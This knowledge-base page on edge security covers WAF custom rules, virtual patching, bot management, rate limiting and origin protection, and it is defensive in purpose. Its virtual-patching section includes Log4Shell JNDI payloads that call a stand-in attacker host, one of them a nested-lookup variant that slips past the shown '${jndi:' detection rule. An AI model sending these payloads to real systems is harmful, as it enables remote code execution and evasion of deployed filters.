Steven's Knowledge

Patterns

Layered defense, custom WAF rules, virtual patching, bot management strategies, API-specific protection, observability

The patterns that turn off-the-shelf edge security into something tuned to your specific risk surface.

Layered Defense (Defense in Depth)

Don't rely on one layer:

[Client] → [DDoS scrub]    L3/L4 absorption
        → [CDN cache]       Static content offload
        → [WAF (edge)]      Pattern matching
        → [Bot management]  Behavior + fingerprint
        → [Rate limiter]    Per-key throttling
        → [API gateway]     AuthN/AuthZ + per-route limits
        → [App WAF / RASP]  Last-mile filtering
        → [Application]     Secure code
        → [Origin protection] Allow only edge IPs

Each layer has a different failure mode; an attack that defeats one usually doesn't defeat them all. Cloudflare + AWS WAF on the ALB is a common belt-and-suspenders setup for serious workloads.

Custom WAF Rules

Managed rules cover the common OWASP attack classes. Custom rules cover your specific needs:

# Cloudflare custom rule examples

Block requests where:
  http.request.uri.path matches "^/api/internal/" AND
  not ip.src in {192.0.2.0/24, 198.51.100.0/24}
Action: Block
Reason: internal endpoints not for public

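Allow requests where:
  http.request.uri.path eq "/health" AND
  ip.src in {203.0.113.0/24}
Action: Allow (priority high)
Reason: skip rate limit for monitoring (the range is a placeholder for your monitoring provider's public egress IPs; private RFC 1918 addresses never appear as ip.src at the edge)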

Challenge requests where:
  http.request.method eq "POST" AND
  http.request.uri.path eq "/login" AND
  cf.threat_score gt 30
Action: Managed Challenge

The pattern: managed rules block the obviously bad; custom rules express your application's specific access rules and exceptions.
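To make the evaluation order concrete, here is a minimal Python sketch of two of the rules above (the internal-path block and the login challenge). The `Request` model and the `evaluate` function are hypothetical names for illustration, not a vendor API; a real WAF evaluates its own expression language at the edge.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass
class Request:
    """Hypothetical request model; fields mirror the rule inputs above."""
    method: str
    path: str
    src_ip: str
    threat_score: int = 0


# Ranges allowed to reach /api/internal/ (documentation ranges from the rule above).
INTERNAL_ALLOWED = [ip_network("192.0.2.0/24"), ip_network("198.51.100.0/24")]


def in_any(ip: str, networks) -> bool:
    """True if the address falls inside any of the given networks."""
    addr = ip_address(ip)
    return any(addr in net for net in networks)


def evaluate(req: Request) -> str:
    """Return the action of the first matching rule, or 'pass' if none match."""
    if req.path.startswith("/api/internal/") and not in_any(req.src_ip, INTERNAL_ALLOWED):
        return "block"
    if req.method == "POST" and req.path == "/login" and req.threat_score > 30:
        return "managed_challenge"
    return "pass"  # falls through to managed rules and later layers
```

Writing rules as a pure function like this is also a cheap way to unit-test intended behavior before translating it into the provider's rule syntax.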

Virtual Patching

A CVE drops for your framework. Patching takes time (test, stage, deploy). A WAF can virtually patch within minutes.

Example: Log4Shell in Log4j (CVE-2021-44228). The exploit is a ${jndi:...} lookup string in any input the application logs, most often a header. WAF rule:

http.user_agent contains "${jndi:" OR
http.request.body.raw contains "${jndi:" OR
any(http.request.headers.values[*] contains "${jndi:")
Action: Block

You can deploy this in 15 minutes. The Java patch takes a sprint. Virtual patch buys you the time.

The catch: virtual patches are temporary. They protect known exploitation patterns. Don't skip the real fix; the attacker will eventually craft a payload your virtual patch misses.
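The limitation is easy to demonstrate. The sketch below reimplements the substring check in Python (the function name `naive_jndi_match` and the sample payloads are illustrative assumptions) and shows that a nested-lookup variant of the same exploit no longer contains the literal `${jndi:` string.

```python
def naive_jndi_match(headers: dict[str, str], body: str) -> bool:
    """Case-insensitive substring check, equivalent in spirit to the rule above."""
    needle = "${jndi:"
    values = list(headers.values()) + [body]
    return any(needle in value.lower() for value in values)


# The textbook payload: caught by the substring match.
plain = {"User-Agent": "${jndi:ldap://attacker.example/a}"}

# Nested lookup: Log4j resolves ${lower:j} to "j" before evaluating the outer
# lookup, so the exploit still works but the literal "${jndi:" never appears.
obfuscated = {"User-Agent": "${${lower:j}ndi:ldap://attacker.example/a}"}

caught = naive_jndi_match(plain, "")
missed = not naive_jndi_match(obfuscated, "")
```

Here `caught` and `missed` are both true: the first payload is blocked and the second passes the rule. Vendor-managed rules track such variants better than a hand-written match, but the real fix is still the library upgrade.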

API-Specific Protection

Web traffic and API traffic have very different shapes:

Web                          API
Browsers, HTML, JS           Programs, JSON, gRPC
Static, cacheable            Dynamic, mostly authenticated
Bot challenges work          Bot challenges break clients
Rate limit by IP             Rate limit by API key
WAF rules for SQLi in URL    Rules for SQLi in JSON body

API-aware protection:

  • Schema validation: only POST bodies matching the OpenAPI schema are allowed
  • OAuth / API key required: enforce at the edge
  • Per-key rate limits: free tier vs paid tier
  • Method restrictions: only POST/GET on this endpoint, no PUT/DELETE
  • Body content scan: SQLi/XSS patterns in JSON values, not just URLs

Cloudflare API Shield, AWS WAF API protection, Fastly Next-Gen WAF, Salt Security, Noname Security target this segment.
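As a rough illustration of method restriction plus schema validation, here is a standard-library Python sketch. The route `/api/orders`, its fields, and the `ROUTE_POLICY` structure are hypothetical; a real deployment would typically validate against the OpenAPI document itself rather than a hand-written table.

```python
import json

# Hypothetical per-route policy: allowed methods and the exact JSON fields of a POST body.
ROUTE_POLICY = {
    "/api/orders": {
        "methods": {"GET", "POST"},
        "body_fields": {"sku": str, "quantity": int},
    },
}


def check_request(method: str, path: str, raw_body: str = "") -> tuple[bool, str]:
    """Return (allowed, reason) for a request against the route policy."""
    policy = ROUTE_POLICY.get(path)
    if policy is None:
        return False, "unknown route"
    if method not in policy["methods"]:
        return False, "method not allowed"
    if method != "POST":
        return True, "ok"
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return False, "body is not valid JSON"
    if not isinstance(body, dict):
        return False, "body must be a JSON object"
    expected = policy["body_fields"]
    if set(body) != set(expected):
        return False, "unexpected or missing fields"
    for name, expected_type in expected.items():
        # Reject booleans explicitly: bool is a subclass of int in Python.
        if isinstance(body[name], bool) or not isinstance(body[name], expected_type):
            return False, f"field {name!r} has wrong type"
    return True, "ok"
```

Strict typing does much of the injection defense for free: a `quantity` of `"2 OR 1=1"` is rejected as a string before any pattern scan runs.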

Bot Management Strategy

Not all bots are bad. Build a tiered strategy:

# Allowlist verified good bots: search engines, link previewers (priority 1)
If: user_agent matches "googlebot|bingbot|slackbot" AND verified
Action: Allow

# Allow known monitoring (priority 2)
If: user_agent matches "uptime-robot|datadog-checks" AND ip in {known_ranges}
Action: Allow

# Challenge suspicious (priority 3)
If: client's TLS fingerprint matches "headless-chrome"
Action: Managed Challenge

# Block known bad (priority 4)
If: ip.src in known_bad_ips OR threat_score > 40
Action: Block

# Default (priority 5)
Action: Allow
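The tiers above amount to a first-match decision function. A minimal Python sketch, assuming the edge has already computed the signals (the `BotSignals` fields are hypothetical names, and "verified" stands for whatever bot verification your provider performs):

```python
from dataclasses import dataclass


@dataclass
class BotSignals:
    """Hypothetical per-request signals, assumed to be computed upstream."""
    user_agent: str
    verified_bot: bool = False
    from_known_monitor_ip: bool = False
    tls_fingerprint: str = ""
    on_bad_ip_list: bool = False
    threat_score: int = 0


GOOD_BOTS = ("googlebot", "bingbot", "slackbot")
MONITORS = ("uptime-robot", "datadog-checks")


def decide(s: BotSignals) -> str:
    """Evaluate tiers in priority order; the first match wins."""
    ua = s.user_agent.lower()
    if s.verified_bot and any(bot in ua for bot in GOOD_BOTS):
        return "allow"
    if s.from_known_monitor_ip and any(m in ua for m in MONITORS):
        return "allow"
    if s.tls_fingerprint == "headless-chrome":
        return "managed_challenge"
    if s.on_bad_ip_list or s.threat_score > 40:
        return "block"
    return "allow"
```

Note that the user agent alone never grants an allow: a client claiming to be Googlebot without verification falls through to the later tiers.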

For high-value endpoints (login, checkout):

  • Always challenge on suspicious signals
  • Lower threshold for friction (Turnstile is brief; legitimate users don't mind)
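  • Track outcomes: how often does the bot challenge fire, and how often is it solved? A low solve rate on traffic that otherwise looks legitimate (logged-in sessions, returning customers) means you're blocking real users; a low solve rate on anonymous scripted traffic is the challenge doing its job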

Rate Limiting Strategies

Beyond "X requests per minute":

Strategy             When
Fixed window         Simple but bursty at window boundaries
Sliding window       Smooth; preferred for user-facing limits
Token bucket         Burst-tolerant; good for API users
Leaky bucket         Smooth output; good when origin can't burst
Concurrency limit    Limit concurrent requests rather than rate
Adaptive             Tighten when error rate or latency rises
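For reference, a token bucket fits in a few lines. This is a single-process sketch with an injectable clock for testing; the class and parameter names are illustrative, and a production limiter at the edge would keep its state in a shared store.

```python
import time


class TokenBucket:
    """Token bucket: refills at `rate` tokens per second up to `capacity`."""

    def __init__(self, rate: float, capacity: float, now=time.monotonic):
        self.rate = rate
        self.capacity = capacity
        self._now = now            # clock function, injectable for tests
        self._tokens = capacity    # start full so an initial burst is allowed
        self._last = now()

    def allow(self, cost: float = 1.0) -> bool:
        """Refill for the elapsed time, then spend `cost` tokens if available."""
        current = self._now()
        elapsed = current - self._last
        self._last = current
        self._tokens = min(self.capacity, self._tokens + elapsed * self.rate)
        if self._tokens >= cost:
            self._tokens -= cost
            return True
        return False
```

With `rate=1.0` and `capacity=3`, a client can burst three requests at once and then sustain one per second, which is the burst tolerance the table refers to.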

Per-endpoint tuning:

/login:           5/min/IP, 100/hour/IP, then challenge
/api/search:      100/min/key, 10k/day/key
/api/checkout:    20/min/key, customer-tier-aware
/health:          unlimited
/static/*:        CDN-cached, no rate limit needed

The login endpoint deserves the tightest limits: credential stuffing is one of the most common abuse patterns against it.
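A per-key sliding-window limiter for a rule like "5/min/IP" on /login can be sketched as follows. This is an in-memory, single-process illustration (the class name is hypothetical); the caller passes the current time explicitly so the behavior is easy to test.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Sliding-window log: at most `limit` hits per key in any `window_seconds` span."""

    def __init__(self, limit: int, window_seconds: float):
        self.limit = limit
        self.window = window_seconds
        self._hits = defaultdict(deque)  # key -> timestamps of accepted hits

    def allow(self, key: str, now: float) -> bool:
        hits = self._hits[key]
        # Drop timestamps that have aged out of the window.
        while hits and hits[0] <= now - self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


login_limiter = SlidingWindowLimiter(limit=5, window_seconds=60)
```

Unlike a fixed window, this never admits a double burst across a window boundary, at the cost of storing one timestamp per accepted request.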

Geo-Based Controls

Geo blocking is crude but useful:

  • Block countries you don't serve: if your business is US-only, blocking the rest of the world cuts off a large share of opportunistic attack traffic (though not attackers who proxy through US IPs).
  • Lower thresholds for high-risk geos: not block, but more aggressive challenges.
  • Compliance: data sovereignty rules may require geo-routing to specific regions.

Be careful: legitimate customers on VPNs can appear to come from anywhere. Don't block them outright; tier the action by risk level.
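Tiering by risk can be as simple as a lookup that returns an action instead of a yes/no. In this sketch the country sets and the exempt-IP set are hypothetical inputs ("XX" and "ZZ" are placeholder codes, not real countries), and the exemption models a support exception for a known customer.

```python
def geo_action(
    country: str,
    client_ip: str,
    served: set[str],
    elevated_risk: set[str],
    exempt_ips: frozenset[str] = frozenset(),
) -> str:
    """Pick an action by geography, with explicit per-IP support exceptions."""
    if client_ip in exempt_ips:
        return "allow"               # exception granted through the support process
    if country in elevated_risk:
        return "managed_challenge"   # more friction, but not a hard block
    if country in served:
        return "allow"
    return "block"
```

For example, `geo_action("XX", ip, {"US"}, {"XX"})` challenges rather than blocks, so a legitimate customer behind a VPN exit in an elevated-risk country can still get through.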

Origin Protection (Hidden Origin)

Edge protection is worthless if attackers can hit your origin directly. Methods:

  1. Allowlist Cloudflare IPs in your security group / firewall.
  2. Cloudflare Tunnel / AWS PrivateLink / GCP Private Service Connect: origin has no public IP at all.
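  3. Authenticated Origin Pulls (Cloudflare's name for edge-to-origin mTLS): the edge presents a client certificate; the origin rejects connections without it.
  4. mTLS with other providers: the same idea; the origin only accepts connections that present the WAF's client certificate.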

Many a tale of woe: "We have a WAF!" Yes, but dig +short origin.your-app.com resolves to a public IP. Lock it down.
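Both checks are easy to automate. The sketch below uses Python's `ipaddress` module; `EDGE_RANGES` holds a placeholder documentation range, not a real provider range (in practice you would load your provider's published list), and the function names are illustrative.

```python
from ipaddress import ip_address, ip_network

# Placeholder only: replace with the ranges your edge provider publishes.
EDGE_RANGES = [ip_network("198.51.100.0/24")]


def is_edge_source(peer_ip: str, edge_ranges=EDGE_RANGES) -> bool:
    """True if a connection's peer address belongs to the edge provider."""
    addr = ip_address(peer_ip)
    return any(addr in net for net in edge_ranges)


def origin_is_exposed(resolved_ip: str) -> bool:
    """True if the origin hostname resolved to a globally routable address."""
    return ip_address(resolved_ip).is_global
```

`is_edge_source` belongs in the origin's firewall logic or access-log analysis; `origin_is_exposed` is the scripted version of the `dig` check, suitable for a scheduled job that alerts when the origin record starts pointing at a public address.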

Observability for Edge Security

Edge events are signal-rich. Ingest them:

  • WAF event logs → SIEM (Splunk, Datadog, OpenSearch). Real-time queries.
  • Rate-limit hits → metric (waf_rate_limit_block_total{rule="login"})
  • Bot scores → Grafana dashboard showing legitimate vs. suspicious traffic mix
  • Anomaly alerts: sudden spike in 403s, new IPs, unusual country distribution

Alert on:

  • Sudden rule-block-rate increase (might be attack OR new false positive — investigate)
  • Authenticated user being blocked (likely false positive; fix urgently)
  • Origin traffic from non-WAF IP (origin protection breach)
  • DDoS scrubbing engaged (provider notification)

Connect to your Observability Pipelines to route these.
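For the "sudden rule-block-rate increase" alert, a simple baseline comparison is often enough to start with. This sketch assumes you already export a per-interval block count (for example from the rate-limit metric above); the thresholds and the function name are illustrative defaults, not tuned values.

```python
from statistics import mean, pstdev


def is_spike(
    history: list[float],
    current: float,
    min_sigma: float = 3.0,
    min_ratio: float = 2.0,
) -> bool:
    """Flag `current` if it is far above the recent baseline.

    Requires both a statistical jump (baseline + min_sigma * stddev) and a
    relative jump (min_ratio * baseline) so that quiet, low-variance rules
    do not alert on trivial changes.
    """
    if len(history) < 5:
        return False  # not enough data for a meaningful baseline
    baseline = mean(history)
    spread = pstdev(history)
    above_sigma = current > baseline + min_sigma * spread
    above_ratio = current > baseline * min_ratio
    return above_sigma and above_ratio
```

A spike tells you something changed, not what: the same signal fires for an attack and for a new false positive after a deploy, so route it to a human with the rule ID attached.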

Modern attackers use the same browser tools as users. Your CDN/WAF must distinguish them without breaking caching:

  • Cache by URL + query string only — not by cookie (else cache hit rate craters)
  • Bot signals influence rules, not cache — bot gets blocked but cache key is the same
  • Separate API routes from cacheable routes: /api/* and /cms/* get different policies

Cache miss rate is the secret cost of misconfigured WAFs. A WAF that breaks cache hit ratio costs you in origin load and latency.
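A cache key built only from host, path, and normalized query string might look like the sketch below. The function name is hypothetical, and the `headers` parameter is accepted but deliberately unused to make the point that cookies and bot signals stay out of the key.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit


def cache_key(url: str, headers: dict[str, str]) -> str:
    """Build a cache key from host, path, and sorted query parameters.

    `headers` (cookies, bot scores) is intentionally ignored: those signals
    may drive allow/block decisions but must not fragment the cache.
    """
    parts = urlsplit(url)
    # Sort parameters so ?a=1&b=2 and ?b=2&a=1 share one cache entry.
    query = urlencode(sorted(parse_qsl(parts.query, keep_blank_values=True)))
    base = f"{parts.netloc.lower()}{parts.path}"
    return f"{base}?{query}" if query else base
```

Two requests for the same URL with different session cookies produce the same key, so one origin fetch serves both.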

Multi-Tenant SaaS Considerations

Different customers, different risk profiles, possibly different regulations:

  • Per-tenant WAF rules: enterprise tenants might have stricter custom rules
  • Per-tenant rate limits: based on contracted tier
  • Tenant isolation: an attack on one tenant shouldn't drown the others
  • Audit logs per tenant: customer's security team can review their own traffic

Cloudflare Enterprise and AWS WAF both support per-resource rules; map your tenants to those.

CI for WAF Rules

WAF rules deserve the same engineering discipline as code:

  • Store rules in Git (Terraform Cloudflare provider, AWS WAF JSON in Git)
  • Code review before changes
  • Test in staging WAF first
  • Audit log of rule changes
  • Tagging of rules (link to ticket / CVE / compliance requirement)

# Terraform Cloudflare provider
resource "cloudflare_ruleset" "waf" {
  zone_id = var.zone_id
  name    = "WAF rules"
  kind    = "zone"
  phase   = "http_request_firewall_custom"

  # $admin_ips refers to a Cloudflare IP list named admin_ips, assumed to exist
  rules {
    expression  = "(http.request.uri.path matches \"^/api/admin\" and not ip.src in $admin_ips)"
    action      = "block"
    description = "Admin API restricted to known IPs (ticket: SEC-1234)"
    enabled     = true
  }
}
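The tagging requirement is easy to enforce in CI. A minimal lint sketch in Python, assuming rules have been exported to a list of dictionaries with `action` and `description` keys (that export format, the ticket pattern, and the allowed-action set are all assumptions to adapt to your own conventions):

```python
import re

# Matches ticket keys such as SEC-1234; CVE ids like CVE-2021-44228 also match.
TICKET_RE = re.compile(r"\b[A-Z]{2,10}-\d+\b")

# Hypothetical team policy: actions permitted in custom rules.
ALLOWED_ACTIONS = {"block", "managed_challenge", "log", "skip"}


def lint_rules(rules: list[dict]) -> list[str]:
    """Return a list of human-readable problems; empty means the rules pass."""
    problems = []
    for index, rule in enumerate(rules):
        description = rule.get("description", "")
        if not TICKET_RE.search(description):
            problems.append(f"rule {index}: description lacks a ticket or CVE reference")
        if rule.get("action") not in ALLOWED_ACTIONS:
            problems.append(f"rule {index}: action {rule.get('action')!r} is not allowed")
    return problems
```

Run it as a pipeline step that fails the build when the returned list is non-empty, so an untagged rule never reaches review.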

Anti-Patterns

Block-only WAFs. No log mode, no analysis, just block. You'll either over-block or under-block; you won't know which.

Forgotten origin exposure. WAF protects the edge; origin has a public IP. Attacker just hits origin. Lock it down.

Permanent virtual patches. Virtual patch deployed in panic for CVE X; never followed up with the real fix. Eventually the WAF rule is bypassed.

Single point of failure at the WAF. Cloudflare has outages too. Plan: how does your service degrade if the WAF is unavailable? Fail-open (risky) or fail-closed (downtime).

Bot management too aggressive. Legitimate users from VPNs / corporate proxies get challenged constantly. Solve rate matters; tune.

Geo-blocks without exceptions for support. Your customer in country X can't reach you. Build the exception process before you need it.

No alerting on WAF metrics. You miss the slow attack that nibbles for a week. Alert on changes, not just thresholds.

What's Next

  • Best Practices — tuning false positives, attack runbook, common pitfalls, scaling
